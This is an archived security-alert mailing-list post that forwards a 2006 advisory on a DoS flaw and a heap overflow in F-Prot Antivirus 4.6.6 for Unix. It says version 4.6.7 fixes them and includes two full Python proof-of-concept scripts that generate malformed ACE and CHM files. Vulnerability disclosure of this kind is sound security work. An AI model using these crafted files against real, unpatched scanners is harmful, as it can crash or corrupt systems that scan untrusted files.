ðòïåëôù 


  áòèé÷ 


Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  óôáôøé 


  ðåòóïîáìøîïå 


  ðòïçòáííù 



ðéûéôå
ðéóøíá














     áòèé÷ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: [UNIX] F-Prot Antivirus Heap Overflow and DoS



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
> Sent: Thursday, December 07, 2006 6:28 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [UNIX] F-Prot Antivirus Heap Overflow and DoS
> 
> 
> F-Prot Antivirus Heap Overflow and DoS 
> 
> 
> 
> Two vulnerabilities in F-Prot Antivirus 
> <http://www.f-prot.com/download/home_user/download_fplinux.htm
> l>  4.6.6 for Unix platforms could allow a remote attacker to 
> cause a DoS or execute an arbitrary code. 
> 
> 
> 1. ACE file Denial of Service When parsing a specially 
> crafted ACE compressed file F-Prot Antivirus will enter in an 
> infinite loop. 
> See fprot1.py for more details. 
> 
> 2. CHM file heap overflow When parsing a specially crafted 
> CHM file a heap overflow will occur in F-Prot Antivirus. 
> See fprot2.py for more details. 
> 
> Vendor Status: 
> Update to F-Prot version 4.6.7: 
> http://www.f-prot.com/news/gen_news/061201_release_unix467.html 
> 
> Exploits: 
> # fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS 
> # 
> # Copyright (c) 2006 Evgeny Legerov 
> # 
> # Permission to use, copy, modify, and distribute this 
> software for any 
> # purpose with or without fee is hereby granted, provided 
> that the above 
> # copyright notice and this permission notice appear in all copies. 
> # 
> # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS 
> ALL WARRANTIES 
> # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF 
> # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR 
> BE LIABLE FOR 
> # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR 
> ANY DAMAGES 
> # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, 
> WHETHER IN AN 
> # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, 
> ARISING OUT OF 
> # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 
> # 
> # To test this code on Linux: 
> # 
> # create ACE compressed file 
> # $ ./fprot1.py > 1.ace 
> # $ f-prot 1.ace 
> 
> import sys 
> import struct 
> 
> ACE=""" 
>  58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14 
>  02 00 31 12 82 33 b6 45 97 7d 00 00 00 00 16 2a 
>  55 4e 52 45 47 49 53 54 45 52 45 44 20 56 45 52 
>  53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff 
>  00 00 00 00 41 42 43 44 41 42 43 44 00 00 00 00 
>  02 05 41 41 41 41 0d 00 41 41 41 41 41 41 41 41 
>  41 41 41 41 41 
> """ 
> 
> s = "" 
> for i in [chr(int(i, 16)) for i in ACE.split(" ") if 
> len(i.strip()) > 0]: 
>         s += i 
> 
> sys.stdout.write(s) 
> 
> # fprot2.py - trivial proof of concept code for F-Prot 4.6.6 
> .CHM heap 
> # overflow 
> # 
> # Copyright (c) 2006 Evgeny Legerov 
> # 
> # Permission to use, copy, modify, and distribute this 
> software for any 
> # purpose with or without fee is hereby granted, provided 
> that the above 
> # copyright notice and this permission notice appear in all copies. 
> # 
> # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS 
> ALL WARRANTIES 
> # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF 
> # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR 
> BE LIABLE FOR 
> # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR 
> ANY DAMAGES 
> # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, 
> WHETHER IN AN 
> # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, 
> ARISING OUT OF 
> # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 
> # 
> # $ ./fprot2.py > 1.chm 
> # $ f-prot 1.chm 
> 
> import sys 
> import struct 
> 
> s="" 
> s+="ITSF" # signature 
> s+=struct.pack("<L",3) # version 
> s+=struct.pack("<L",96) # header_len 
> s+=struct.pack("<L",1) # unknown 
> s+=struct.pack("<L",0x41424344) # last_modified 
> s+=struct.pack("<L",0x419) # lang_id 
> s+="A"*16 #dir_clsid 
> s+="B"*16 #stream_clsid 
> s+=struct.pack("<L",96) + "\x00" * 4 #sec0_offset 
> s+=struct.pack("<L",24) + "\x00" * 4 #sec0_len 
> s+=struct.pack("<L",120) + "\x00" *4 #dir_offset 
> s+=struct.pack("<L",4180) + "\x00" * 4 #dir_len 
> s+=struct.pack("<L",4300) + "\x00"*4 #data_offset 
> s+="A"*24 
> s+="ITSP" 
> s+=struct.pack("<L", 1) # version 
> s+=struct.pack("<L",0x54) # header_len 
> s+=struct.pack("<L", 0xa) # unknown 
> s+=struct.pack("<L",1000) # block_len - BUG? 
> s+=struct.pack("<L",2) # blockidx 
> s+=struct.pack("<L", 1) # index_depth 
> s+=struct.pack("<L", -1) # index_root 
> s+=struct.pack("<L",0) # index_head 
> s+=struct.pack("<L",0) # index_tail 
> s+=struct.pack("<L", -1) # unknown2 
> s+=struct.pack("<L",1) # num_blocks 
> s+=struct.pack("<L", 1033) # lang_id 
> s+="A"*32 
> s+="B"*10000 
> 
> sys.stdout.write(s) 
> 
> 
> Additional Information: 
> The original article can be found at: 
> http://gleg.net/fprot.txt 
> 
> 
> ==============================================================
> ================== 
> 
> 
> 
> 
> 
> This bulletin is sent to members of the SecuriTeam mailing list. 
> To unsubscribe from the list, send mail with an empty subject 
> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx 
> In order to subscribe to the mailing list and receive 
> advisories in HTML format, simply forward this email to: 
> html-list-subscribe@xxxxxxxxxxxxxx 
> 
> 
> 
> ==============================================================
> ================== 
> ==============================================================
> ================== 
> 
> DISCLAIMER: 
> The information in this bulletin is provided "AS IS" without 
> warranty of any kind. 
> In no event shall we be liable for any damages whatsoever 
> including direct, indirect, incidental, consequential, loss 
> of business profits or special damages. 
> 
> 
> 
> 
> 
> 



 




Copyright © Lexa Software, 1996-2009.